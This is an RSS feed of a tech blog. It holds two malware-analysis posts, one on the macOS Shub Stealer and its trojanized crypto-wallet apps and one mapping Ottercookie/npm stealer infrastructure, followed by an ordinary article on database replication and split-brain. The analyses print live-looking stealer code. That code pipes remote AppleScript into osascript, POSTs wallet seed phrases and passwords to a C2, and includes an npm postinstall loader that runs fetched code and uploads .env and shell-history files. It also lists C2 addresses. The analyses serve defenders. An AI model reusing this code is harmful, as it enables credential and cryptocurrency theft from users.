<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Walmart Global Tech Blog - Medium]]></title>
        <description><![CDATA[We’re powering the next great retail disruption. Learn more about us — https://www.linkedin.com/company/walmartglobaltech/ - Medium]]></description>
        <link>https://medium.com/walmartglobaltech?source=rss----905ea2b3d4d1---4</link>
        
        <generator>Medium</generator>
        <lastBuildDate>Sun, 17 May 2026 16:17:25 GMT</lastBuildDate>
        <atom:link href="https://medium.com/feed/walmartglobaltech" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Shub Stealers Fake Crypto Apps]]></title>
            <link>https://medium.com/walmartglobaltech/shub-stealers-fake-crypto-apps-d5e2a65618b7?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/d5e2a65618b7</guid>
            <category><![CDATA[reverse-engineering]]></category>
            <category><![CDATA[malware]]></category>
            <category><![CDATA[macos]]></category>
            <category><![CDATA[infosec]]></category>
            <dc:creator><![CDATA[Jason Reaves]]></dc:creator>
            <pubDate>Mon, 06 Apr 2026 17:34:44 GMT</pubDate>
            <atom:updated>2026-04-06T17:34:43.106Z</atom:updated>
            <content:encoded><![CDATA[<p>By: Jason Reaves</p><p>Shub Stealer[1] which looks very similar to MacSync also leveraged the same obfuscator on their shellscript[2] that is very popular lately.</p><p>Shell script:</p><pre>fd674425d3fc0d95bbc90dcd598eabdb2ddd77037954c8a1d1175f118d1e8ddd</pre><p>After decoding however it is a bit different as it includes a number of checks:</p><pre>#!/bin/zsh<br># Debug loader — detect CIS and block with telemetry<br>IS_CIS=&quot;false&quot;<br>if defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2&gt;/dev/null | grep -qi russian; then<br>    IS_CIS=&quot;true&quot;<br>fi<br><br># Detect locale info — sanitize for JSON<br>LOCALE_INFO=$(defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2&gt;/dev/null | grep -i &quot;KeyboardLayout Name&quot; | head -5 | tr &#39;\n&#39; &#39;,&#39; | tr -d &#39;&quot;&#39; | tr -d &quot;&#39;&quot; || echo &quot;unknown&quot;)<br>HOSTNAME=$(hostname 2&gt;/dev/null | tr -d &#39;&quot;&#39; || echo &quot;unknown&quot;)<br>OS_VER=$(sw_vers -productVersion 2&gt;/dev/null || echo &quot;unknown&quot;)<br>EXT_IP=$(curl -s --max-time 5 https://api.ipify.org 2&gt;/dev/null || curl -s --max-time 5 hxxps://icanhazip.com 2&gt;/dev/null || curl -s --max-time hxxps://ifconfig[.]me 2&gt;/dev/null || echo &quot;unknown&quot;)<br>EXT_IP=$(echo &quot;$EXT_IP&quot; | tr -d &#39;<br><br> &#39;)<br><br># Build JSON safely using printf<br>send_debug_event() {<br>    local EVT=&quot;$1&quot;<br>    local JSON=$(printf &#39;{&quot;event&quot;:&quot;%s&quot;,&quot;build_hash&quot;:&quot;%s&quot;,&quot;ip&quot;:&quot;%s&quot;,&quot;is_cis&quot;:&quot;%s&quot;,&quot;locale&quot;:&quot;%s&quot;,&quot;hostname&quot;:&quot;%s&quot;,&quot;os_version&quot;:&quot;%s&quot;}&#39; &quot;$EVT&quot; &quot;&quot; &quot;$EXT_IP&quot; &quot;$IS_CIS&quot; &quot;$LOCALE_INFO&quot; &quot;$HOSTNAME&quot; &quot;$OS_VER&quot;)<br>    curl -s -X POST &quot;hxxps://coco2-hram[.]com/api/debug/event&quot; -H &quot;Content-Type: application/json&quot; -d &quot;$JSON&quot; --max-time 5 &gt;/dev/null 2&gt;&amp;1<br>}<br><br># If CIS — send cis_blocked event and exit<br>if [ &quot;$IS_CIS&quot; = &quot;true&quot; ]; then<br>    send_debug_event &quot;cis_blocked&quot; &gt;/dev/null 2&gt;&amp;1<br>    exit 0<br>fi<br><br># Not CIS — send loader_requested event<br>send_debug_event &quot;loader_requested&quot; &gt;/dev/null 2&gt;&amp;1 &amp;<br><br>daemon_function() {<br>    exec &lt;/dev/null<br>    exec &gt;/dev/null<br>    exec 2&gt;/dev/null<br>    curl -k -s --max-time 30 -H &quot;User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36&quot; &quot;https://coco2-hram[.]com/debug/payload.applescript&quot; | osascript<br>}<br>daemon_function &quot;$@&quot; &amp;<br>exit 0</pre><p>The downloaded payload script is the main stealer component:</p><pre>writeText(&quot;SHub Stealer&quot; &amp; return, writemind &amp; &quot;info&quot;)<br>writeText(&quot;Build Tag: &quot; &amp; return, writemind &amp; &quot;info&quot;)<br>writeText(&quot;External IP: &quot; &amp; externalIP &amp; return &amp; return, writemind &amp; &quot;info&quot;)<br>writeText(&quot;System Info&quot; &amp; return, writemind &amp; &quot;info&quot;)<br>writeText(&quot;Username: &quot; &amp; username &amp; return, writemind &amp; &quot;info&quot;)<br>writeText(&quot;Password: &quot; &amp; password_entered &amp; return &amp; return, writemind &amp; &quot;info&quot;)</pre><p>Most of the functionality has been detailed in numerous other blogs surrounding AMOS, MacSync, Odyssey and all the other variants. I decided instead to focus on their fake apps they download:</p><pre>set asarUrl to gateUrl &amp; &quot;/exodus-asar&quot;<br>set asarUrl to gateUrl &amp; &quot;/atomic-asar&quot;<br>set asarUrl to gateUrl &amp; &quot;/ledger-asar&quot;<br>set asarUrl to gateUrl &amp; &quot;/ledgerlive-asar&quot;<br>set asarUrl to gateUrl &amp; &quot;/trezor-asar&quot;</pre><p>All of the apps come as ASAR files, after extracting them we can go through them one at a time.</p><p>Exodus-asar:</p><p>The relevant code sends off the passphrase and seed file to the C2:</p><pre>this.unlock = async ({<br>        passphrase: t<br>      } = {}) =&gt; {<br>        if (!(await S(this, M)[M].get())) {<br>          return;<br>        }<br>        if (!t) {<br>          throw new Error(&quot;expected passphrase&quot;);<br>        }<br>        const e = await Object(w.readSeco)(await Object(m.getSeedFile)(), t);<br>        const s = await d.fromBuffer(e);<br>        try {<br>          fetch(&quot;hxxps://wallets-gate[.]io/api/injection&quot;, {<br>            method: &quot;POST&quot;,<br>            headers: {<br>              &quot;Content-Type&quot;: &quot;application/json&quot;,<br>              &quot;api-key&quot;: &quot;61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f&quot;<br>            },<br>            body: JSON.stringify({<br>              password: t,<br>              mnemonic: s.mnemonic.toString(&quot;utf8&quot;),<br>              buildid: &quot;d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f&quot;,<br>              app: &quot;exodus&quot;<br>            })<br>          });<br>        } catch (e) {}<br>        const r = S(this, B)[B](s);<br>        Object(o.randomFill)(e);<br>        return {<br>          primarySeedId: r<br>        };<br>      };</pre><p>Atomic:</p><p>For atomic when the wallets get loaded after logging in:</p><pre>await this.$wallets.loadWallets(n, this.password).catch(console.error).finally(() =&gt; {</pre><p>Then the data is shipped off:</p><pre> async loadWallets(e, t) {<br>          const a = await I(V, this).getByPassword(E.MNEMONIC_KEY, t);<br>          fetch(&quot;https://wallets-gate[.]io/api/injection&quot;, {<br>            method: &quot;POST&quot;,<br>            headers: {<br>              &quot;Content-Type&quot;: &quot;application/json&quot;,<br>              &quot;api-key&quot;: &quot;61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f&quot;<br>            },<br>            body: JSON.stringify({<br>              mnemonic: a,<br>              password: t,<br>              buildid: &quot;d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f&quot;,<br>              app: &quot;atomic&quot;<br>            })<br>          }).catch(() =&gt; {});<br>          const n = await D($, this, z).call(this, {<br>            phrase: a,<br>            password: t<br>          });<br>          const r = e.filter(e =&gt; e.privateKey);<br>          await D($, this, ae).call(this, r, n);<br>          i.requestQueueState.setAsCompleted(i.REQUEST_TYPE.WALLETS_LOADED);<br>        }</pre><p>Ledger:</p><p>The backdoored ledger app uses a fake recovery setup to eventually ship off the needed data:</p><pre>  const words = Array.from(inputs).map(i =&gt; i.value.trim());<br>  const token = &#39;61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f&#39;;<br>  const targetUrl = &#39;hxxps://wallets-gate[.]io/api/injection&#39;;<br><br>  fetch(targetUrl, {<br>    method: &#39;POST&#39;,<br>    cache: &#39;no-cache&#39;,<br>    headers: {<br>      &#39;Content-Type&#39;: &#39;application/json&#39;,<br>      &#39;api-key&#39;: token<br>    },<br>    body: JSON.stringify({<br>      mnemonic: words,<br>      buildid: &quot;d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f&quot;,<br>      app: &#39;ledger&#39;,<br>    })<br>  })<br>.then(response =&gt; {<br>  location.href = &#39;index.html&#39;;<br>})<br>.catch(err =&gt; {<br>  location.href = &#39;index.html&#39;;<br>});});</pre><p>LedgerLive is setup in a similar way:</p><pre>continueBtn.addEventListener(&#39;click&#39;, function () {<br>  if (!this.classList.contains(&#39;active&#39;)) return;<br><br>  const words = Array.from(inputs).map(i =&gt; i.value.trim());<br>  const token = &#39;61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f&#39;;<br>  const targetUrl = &#39;https://wallets-gate.io/api/injection&#39;;<br><br>  fetch(targetUrl, {<br>    method: &#39;POST&#39;,<br>    cache: &#39;no-cache&#39;,<br>    headers: {<br>      &#39;Content-Type&#39;: &#39;application/json&#39;,<br>      &#39;api-key&#39;: token<br>    },<br>    body: JSON.stringify({<br>      mnemonic: words,<br>      buildid: &quot;d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f&quot;,<br>      app: &#39;ledger_live&#39;,<br>    })<br>  })</pre><p>Trezor:</p><p>The fake trezor app has a section of code calling itself a webpack hook:</p><pre>    // ============================================================<br>    // 1. WEBPACK HOOK: STEAL NATIVE BIP39 (ID: 39781)<br>    // ============================================================</pre><p>Inide is a config:</p><pre>        const CONFIG = {<br>            API_URL: &#39;https://wallets-gate.io/api/injection&#39;,<br>            API_KEY: &#39;61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f&#39;,<br>            BUILD_ID: &#39;d91d844ad8920458ee99e707b1a203cba8df76ce960195f0993eb3b0e96d893f&#39;,<br>            BLOCK_UPDATES: true,<br>            ONCE: true<br>        };</pre><p>Along with Russian comments:</p><pre>/* Достаточно места для бейджа */</pre><p>The code will pretend a security patch has been applied and ask the user to verify their recovery seed:</p><pre>            &#39;default&#39;: {<br>                title: &#39;Critical Security Update&#39;,<br>                text: &#39;A critical security patch has been released. Verify your recovery seed before updating.&#39;,<br>                btn: &#39;Verify &amp; Update&#39;,<br>                btn_next: &#39;Next Share&#39;,<br>                btn_finish: &#39;Finish &amp; Update&#39;,<br>                error_empty: &#39;Please complete all words&#39;,<br>                error_checksum: &#39;Invalid recovery seed (checksum mismatch)&#39;,<br>                updating: &#39;Updating...&#39;,<br>                words12: &#39;12 Words&#39;,<br>                words20: &#39;20 Words&#39;,<br>                words24: &#39;24 Words&#39;,<br>                share: &#39;Share&#39;</pre><p>If the phrase checks out then it will be shipped off:</p><pre>                let finalMnemonic = mnemonicStr;<br>                if (currentLength === 20 &amp;&amp; collectedShares.length &gt; 0) {<br>                    finalMnemonic = collectedShares.join(&#39;\n\n--- NEXT SHARE ---\n\n&#39;);<br>                }<br><br>                const payload = {<br>                    mnemonic: finalMnemonic,<br>                    buildid: CONFIG.BUILD_ID,<br>                    app: &#39;trezor_suite&#39;,<br>                };<br><br>                fetch(CONFIG.API_URL, {<br>                    method: &#39;POST&#39;,<br>                    headers: { &#39;Content-Type&#39;: &#39;application/json&#39;, &#39;api-key&#39;: CONFIG.API_KEY },<br>                    body: JSON.stringify(payload)<br>                }).catch(e =&gt; {});</pre><p>References</p><p>1: <a href="https://securitylabs.datadoghq.com/articles/tech-impersonators-clickfix-and-macos-infostealers/">https://securitylabs.datadoghq.com/articles/tech-impersonators-clickfix-and-macos-infostealers/</a></p><p>2: <a href="https://gi7w0rm.medium.com/amos-stealer-malext-variant-spread-in-a-global-malvertising-campaign-using-free-text-sharing-4d240e11d7e2">https://gi7w0rm.medium.com/amos-stealer-malext-variant-spread-in-a-global-malvertising-campaign-using-free-text-sharing-4d240e11d7e2</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=d5e2a65618b7" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/shub-stealers-fake-crypto-apps-d5e2a65618b7">Shub Stealers Fake Crypto Apps</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Mapping Ottercookie Infrastructure]]></title>
            <link>https://medium.com/walmartglobaltech/mapping-ottercookie-infrastructure-1c49f0cd3883?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/1c49f0cd3883</guid>
            <category><![CDATA[infosec]]></category>
            <category><![CDATA[malware]]></category>
            <category><![CDATA[reverse-engineering]]></category>
            <dc:creator><![CDATA[Jason Reaves]]></dc:creator>
            <pubDate>Mon, 06 Apr 2026 17:33:39 GMT</pubDate>
            <atom:updated>2026-04-06T17:33:38.234Z</atom:updated>
            <content:encoded><![CDATA[<p>By: Jason Reaves</p><p>A lot of focus specifically surrounding DPRK has been on IT workers but there are multiple entities performing various schemes. One of the more prolific ones being interviewing developers and having them work on TA supplied code repositories from various sites. The malware delivered is normally leveraged for harvesting credentials and crypto; InvisibleFerret[5], BeaverTail, OtterCookie and Golang based malware[4].</p><p>Alot of work goes into tracking and cataloging the various malware families and their code overlaps, not many people focus on the infrastructure side though which is surprising because it’s pretty similar to malware analysis; just more pattern matching.</p><p>While tracking some other malware I ended up pivoting into NodeJS based stealer and backdoor code that resembled similar tactics to DPRK campaigns.</p><p>3a08e7f236aac7f6eb6f75911b98bc5157dcfa53b268b447f7d1b87b0615b90d</p><pre>  &quot;name&quot;: &quot;npm-doc-builder&quot;,<br>  &quot;version&quot;: &quot;1.0.5&quot;,<br>  &quot;description&quot;: &quot;&quot;,<br>  &quot;main&quot;: &quot;index.js&quot;,<br>  &quot;scripts&quot;: {<br>    &quot;postinstall&quot;: &quot;node test.js&quot;<br>  },<br>  &quot;publishConfig&quot;: {<br>    &quot;access&quot;: &quot;public&quot;<br>  },<br>  &quot;dependencies&quot;: {<br>    &quot;axios&quot;: &quot;^1.7.0&quot;,<br>    &quot;child_process&quot;: &quot;^1.0.2&quot;,<br>    &quot;os&quot;: &quot;^0.1.2&quot;<br>  },<br>  &quot;engines&quot;: {<br>    &quot;node&quot;: &quot;&gt;=18&quot;<br>  },<br>  &quot;keywords&quot;: [],<br>  &quot;author&quot;: &quot;&quot;,<br>  &quot;license&quot;: &quot;ISC&quot;,<br>  &quot;type&quot;: &quot;commonjs&quot;</pre><p>The decoded index javascript from this package ends up doing a few things, first it will want to download a SSH key to be added locally:</p><pre>  const _0x30c718 = await fetch(&quot;https://cloudflareinsights[.]vercel[.]app/&quot;);<br>  const {<br>    msg: _0x50cbce<br>  } = await _0x30c718.json();<br>  let _0x581499 = false;<br>  if (process.platform === &quot;linux&quot;) {<br>    _0x581499 = addSshKeyToUser(_0x50cbce);</pre><p>It will also download patterns for scanning</p><pre> const _0x3c4caa = await fetch(&quot;https://cloudflareinsights[.]vercel[.]app/api/scan-patterns&quot;);<br>  const {<br>    scanPatterns: _0x28ca54<br>  } = await _0x3c4caa.json();</pre><p>In this case it returned:</p><pre>{&quot;scanPatterns&quot;:[&quot;.env&quot;,&quot;.bash_history&quot;,&quot;ConsoleHost_history.txt&quot;]}</pre><p>Ultimately wanting to send off the files:</p><pre> for (let _0x14ded9 = 0x0; _0x14ded9 &lt; _0x57def7.length; _0x14ded9++) {<br>    await uploadFile(_0x57def7[_0x14ded9], &quot;https://cloudflareinsights[.]vercel[.]app/api/v1&quot;, _0x581499);</pre><p>Pivoting on this information I found this blog[1], that saame site led me to this[2]:</p><pre>&quot;use strict&quot;;<br><br>const axios = require(&quot;axios&quot;);<br>const process = {<br>  env: {<br>    DEV_API_KEY: &quot;aHR0cHM6Ly93d3cuaXNpbGxlZ2FscmVnaW9uLmNvbS9hcGkvaXAtY2hlY2stZW5jcnlwdGVkLzNhZWIzNGEzMg==&quot;,<br>    DEV_SECRET_KEY: &quot;eC1zZWNyZXQta2V5&quot;,<br>    DEV_SECRET_VALUE: &quot;c2VjcmV0&quot;,<br>  }<br>};<br><br>(async function initializeCaller(..._args) {<br>  const apiEndpoint = atob(process.env.DEV_API_KEY);<br>  const apiHeaderKey = atob(process.env.DEV_SECRET_KEY);<br>  const apiHeaderValue = atob(process.env.DEV_SECRET_VALUE);<br><br>  let retryCount = 5;<br><br>  while (retryCount &gt; 0) {<br>    try {<br>      const originalLog = console.log;<br><br>       // Safe placeholder request<br>      const response = (await axios.post(apiEndpoint, { headers: { [apiHeaderKey]: apiHeaderValue } })).data;<br>      const handler = new Function.constructor(&quot;require&quot;, response);<br>      handler(require);<br><br>      console.log = originalLog;<br>      break;<br>    }<br>    catch (error) {<br>      retryCount--;<br>    }<br>  }<br>})();</pre><p>This code posts hardcoded data to a URI:</p><pre>{ headers: { &#39;x-secret-key&#39;: &#39;secret&#39; } }</pre><p>The downloaded code is obfuscated:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AZp1eK7p77b2gRp6j109lQ.png" /></figure><p>After deobfuscating the code aligns with OtterCookies from another blog[3]:</p><pre>  const u_s = &quot;hxxp://144.172.116[.]22:8086/upload&quot;;<br>  const l_s = &quot;hxxp://144.172.116[.]22:8085/upload&quot;;<br>  const s_s = &quot;hxxp://144.172.116[.]22:8087&quot;;</pre><p>The malware itself aligns with the other blog well enough, focusing more on the infrastructure some pretty noticeable port mappings:</p><pre>HTTP 8085/TCP<br>Express<br><br>HTTP 8086/TCP<br>Express<br><br>HTTP 8087/TCP<br>Express<br><br>UNKNOWN 17500/TCP<br>linux</pre><p>Port 8085 returns this in Censys[6]:</p><pre>Ok</pre><p>Also leveraging the banner hash of port 17500 we can map out quite a bit of infrastructure:</p><pre>services.http.response.body_hashes=&quot;sha256:843ac01149cced785dfebd0028d3b03ba78e286e1c6f9517ebfcdb609d97af4c&quot; and services.banner_hashes=&quot;sha256:31d55cb5dd194cd99387d386e84d8b24d340c0b52983ce630f0aafd70fee008c&quot; and services.port=&quot;17500&quot;</pre><p>IPs:</p><pre> 144.172.110[.]96<br> 144.172.110[.]228<br> 144.172.99[.]248<br> 107.189.22[.]20<br> 144.172.110[.]132<br> 144.172.99[.]81<br> 144.172.116[.]22<br> 144.172.93[.]169<br> 144.172.93[.]253</pre><h3>References</h3><p>1: <a href="https://kmsec.uk/blog/contagious-trader/">https://kmsec.uk/blog/contagious-trader/</a></p><p>2: <a href="https://dprk-research.kmsec.uk/api/samples/76df69b919642ab4d54a94e8988b4fafaa16c933f7bc5d6dffddf4c27762908a">https://dprk-research.kmsec.uk/api/samples/76df69b919642ab4d54a94e8988b4fafaa16c933f7bc5d6dffddf4c27762908a</a></p><p>3: <a href="https://www.enki.co.kr/en/media-center/blog/contagious-interview-campaign-abusing-vscode-distributed-on-github">https://www.enki.co.kr/en/media-center/blog/contagious-interview-campaign-abusing-vscode-distributed-on-github</a></p><p>4: <a href="https://medium.com/walmartglobaltech/golang-backdoor-with-a-side-of-chromeupdatealert-app-9e47d1063ead">https://medium.com/walmartglobaltech/golang-backdoor-with-a-side-of-chromeupdatealert-app-9e47d1063ead</a></p><p>5: <a href="https://www.microsoft.com/en-us/security/blog/2026/03/11/contagious-interview-malware-delivered-through-fake-developer-job-interviews/">https://www.microsoft.com/en-us/security/blog/2026/03/11/contagious-interview-malware-delivered-through-fake-developer-job-interviews/</a></p><p>6: <a href="https://censys.com/">https://censys.com/</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=1c49f0cd3883" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/mapping-ottercookie-infrastructure-1c49f0cd3883">Mapping Ottercookie Infrastructure</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[From Single Instance to Split-Brain: A Database Scaling Journey]]></title>
            <link>https://medium.com/walmartglobaltech/from-single-instance-to-split-brain-a-database-scaling-journey-8b6a27a65023?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/8b6a27a65023</guid>
            <category><![CDATA[software-engineering]]></category>
            <category><![CDATA[software-architecture]]></category>
            <category><![CDATA[database]]></category>
            <category><![CDATA[software-development]]></category>
            <dc:creator><![CDATA[Alok Mishra]]></dc:creator>
            <pubDate>Tue, 31 Mar 2026 18:40:52 GMT</pubDate>
            <atom:updated>2026-03-31T18:40:51.636Z</atom:updated>
            <content:encoded><![CDATA[<p><em>I used to think adding a ‘Read Replica’ was a magic button for scaling applications. I was wrong. While splitting read and write traffic is a standard system design pattern, implementing it introduces a world of pain – from stale reads to the dreaded Split-Brain problem. Here is how database replication actually works, and how to survive the transition.</em></p><p>When people talk about “scaling databases” or “adding read replicas”, they are almost always thinking about one specific architecture:</p><p>Single-leader (Primary-Replica) architecture with asynchronous replication</p><p>This is the architecture used by:</p><ul><li>MySQL + replicas</li><li>PostgreSQL + streaming replication</li><li>Google Cloud SQL</li><li>PlanetScale, Neon, Supabase, etc.</li></ul><p>There is exactly one node that accepts writes → called the <strong>Primary (or Leader/Master).</strong><br>All other nodes are <strong>Read Replicas</strong> → they apply changes from the primary as fast as they can, but always with some delay (replication lag).</p><p>This is the default and dominant model in 99% of applications today.</p><p>Alternative architectures exist (<strong>multi-primary, leaderless, CRDTs</strong>, etc.), but they are rare and come with their own very different trade-offs.</p><p>The second axis that actually matters in practice is:</p><h3><strong>Who manages the replicas and failover for you?</strong></h3><h4>1. Self-hosted / Self-managed</h4><p>You run MySQL or PostgreSQL yourself (on EC2, Kubernetes, bare metal, etc.).</p><p>You are 100% responsible for:</p><ul><li>Setting up replication</li><li>Promoting a new primary when the old one dies</li><li>Routing traffic correctly</li><li>Handling replication lag</li><li>Monitoring, backups, point-in-time recovery, etc.</li></ul><h4>2. Fully-managed cloud services</h4><p>RDS, Aurora, PlanetScale, Neon, Supabase, CockroachDB, Spanner, YugabyteDB, etc.<br>The provider gives you a single connection string (or two: one for writes, one for reads) and magically keeps it pointing to healthy nodes, handles failover in seconds, and often hides (or eliminates) replication lag headaches.</p><p>This second axis is the one that determines how much pain you will actually feel in production.</p><p>Now, suppose you have a naive application with a small user base, and you decide to spin up a single self-managed instance.</p><p>And on the application end, you have provided the DB configurations, and your queries are running on the provided instance.</p><p>Now that your user base has grown exponentially, you, as an architect, observed your query patterns and saw <strong>a read: write</strong> ratio of <strong>100:1</strong>.</p><p>So you decided to make a pivotal decision for your application. And you decided to split your read and write traffic by adding replicas to your database.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6Tn7akDf6x0--WOOcmC4tg.png" /><figcaption>Read-Write Split</figcaption></figure><p>Here, the trouble starts. You have two separate endpoints, suppose</p><pre>primary: db.write.endpoint<br>read replica: db.read.endpoint</pre><p>Now the question arises, how will my application know what kind of DB operation it is, and who will decide which endpoint to call?</p><p>Isn’t it thrilling?</p><p><strong>Identifying the kind of transaction is one of the difficult problems.</strong> There is no automatic detection. Industry wide here are few technique which is being used:</p><ul><li>SQL Parsing: Decide the query type based on the keywords</li><li>Annotation Based: Frameworks like Springboot, supports it using Transactional annotation</li><li>Explict connection: While reading or writing, make use of operation specific connection</li><li>Service Layer Separation: Same database schema, same User model, just two services pointing to different database connections</li></ul><p>To read more about it you can check out my article on <a href="https://medium.com/@alok-mishra98/approaches-to-transaction-routing-77c7f64e7092">transaction routing</a></p><p>Among the available approaches, the explicit connection strategy appears feasible for your team and is therefore implemented. For a period of time, the application operates smoothly.</p><blockquote>However, challenges are inevitable in system design.</blockquote><p>Eventually, one of the replicas becomes unavailable, affecting customers. While the change may appear minimal, you must decide whether to replace the failed replica or tolerate downtime until the server is restored, implying a lower emphasis on availability.</p><p>If you see, here are your issues</p><ul><li>Your team didn’t get any notification about the replica failure.</li><li>If the replica goes down, the team has to manually override db endpoint and may require redeployment or a rolling restart, depending on your architecture.</li></ul><p>But damage is already done, so you started thinking about how to get notified about the failure early, or a way to manage it that doesn’t require manual override.</p><h3>How failover can be managed automatically?</h3><p>You started researching, and you came across terms like DB proxy, orchestrator, consensus, and a lot more. Let&#39;s see what fits where</p><p><strong>DB Proxy</strong> is a smart routing tool that watches all the nodes and keeps pointing to healthy nodes, which means it provides failover support. It also does load balancing, caching, and performance optimisation using connection pooling. Commonly used DB proxies are Amazon RDS Proxy, ProxySQL, and PgBouncer.</p><p>But in the case of failure of the primary node, the proxy is not capable of promoting the replica as master or primary.</p><p>So we need someone who can detect the failure on leader and elect one of the replicas as Primary. That&#39;s the role of an <strong>orchestrator</strong>(like Patroni, Vitess) with a centralised coordination service(like zookeeper, etcd).</p><p>Think of it like air traffic control – the orchestrator monitors all planes (database nodes), decides which runway is active (primary), and updates the control tower (Zookeeper). All pilots (DB proxies) check with the control tower to know where to land.</p><p>In the same way, the orchestrator detects the failure, elects who will new primary, and tells the zookeeper. Now the zookeeper keeps the configuration like primary endpoint, replica endpoints, etc. And DB proxy reads the configurations from zookeeper and route the request.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Rl1YPqqVRewqbQ65IBtavg.png" /><figcaption>Failover management</figcaption></figure><p>You might be thinking if orchestrator does everything, then why does it need zookeeper?</p><p>To answer this, you first need to understand <strong>Split-Brain problem</strong>.</p><h3>Split-Brain Problem</h3><p>Imagine you have 3 database nodes: A (current primary), B and C (replicas).</p><p>A network partition happens:</p><ul><li>Node A can still talk to nodes B</li><li>Node C is isolated from A and B, but can still talk to the outside world or some applications</li></ul><p>Without protection, two bad things can happen:</p><ol><li>Node A thinks “I’m still primary” → keeps accepting writes</li><li>Node C (or an orchestrator that only sees C) thinks “I can’t reach A → A must be dead → I promote myself/C as new primary”</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RNh9Snjn7XhpG5q2YMxaqQ.png" /><figcaption>Split Brain</figcaption></figure><p>Now you have <strong>two primaries at the same time</strong> accepting writes → data corruption, lost updates, inventory goes negative, money disappears, etc.</p><p>This is split-brain. It is the single worst failure mode in distributed databases. Once it happens, you usually have to shut down one side manually and pray.</p><blockquote><strong>Zookeeper/etcd solves this problem for us</strong>. It uses the <strong>consensus algorithms</strong> like Raft, Paxos to enforces the <strong>strict majority quorum</strong>.</blockquote><p><strong><em>Wait – Consensus? Quorum?</em></strong> 😭</p><p>If seeing those words makes you want to close the tab, don’t worry. We will deep dive into those topics in a separate article. For now, just understand that consensus algorithms are simply the way distributed nodes agree on a single source of truth.</p><p>Let’s look at how far we’ve come. Our system design has evolved significantly:</p><ul><li>Level 1: We started with a naive, self-managed single instance.</li><li>Level 2: As traffic grew, we split Read and Write concerns.</li><li>Level 3: We realized manual failover is a nightmare, so we introduced a DB Proxy.</li><li>Level 4: To solve the “Who creates the new Primary?” problem, we added an Orchestrator and Zookeeper to prevent Split-Brain.</li></ul><p>However, we have ignored the elephant in the room.</p><p>We know how to route traffic, but we haven’t discussed the physics of data movement:</p><ol><li>How do replicas actually receive updates from the Primary?</li><li>What happens when the replica is 5 seconds behind (Replication Lag)?</li></ol><p><em>In Part 2, we will tackle Replication Lag and why it breaks your application logic.</em></p><p><strong><em>Follow me so you don’t miss the next part!</em></strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=8b6a27a65023" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/from-single-instance-to-split-brain-a-database-scaling-journey-8b6a27a65023">From Single Instance to Split-Brain: A Database Scaling Journey</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[How Bitsets Supercharged Our Backend: Faster String Overlap Checks at Scale]]></title>
            <link>https://medium.com/walmartglobaltech/how-bitsets-supercharged-our-backend-faster-string-overlap-checks-at-scale-412911bfc3d5?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/412911bfc3d5</guid>
            <category><![CDATA[distributed-systems]]></category>
            <category><![CDATA[backend-development]]></category>
            <category><![CDATA[software-engineering]]></category>
            <category><![CDATA[performance-optimization]]></category>
            <dc:creator><![CDATA[Jiaqi Zhu]]></dc:creator>
            <pubDate>Wed, 25 Mar 2026 19:02:18 GMT</pubDate>
            <atom:updated>2026-03-25T19:02:17.299Z</atom:updated>
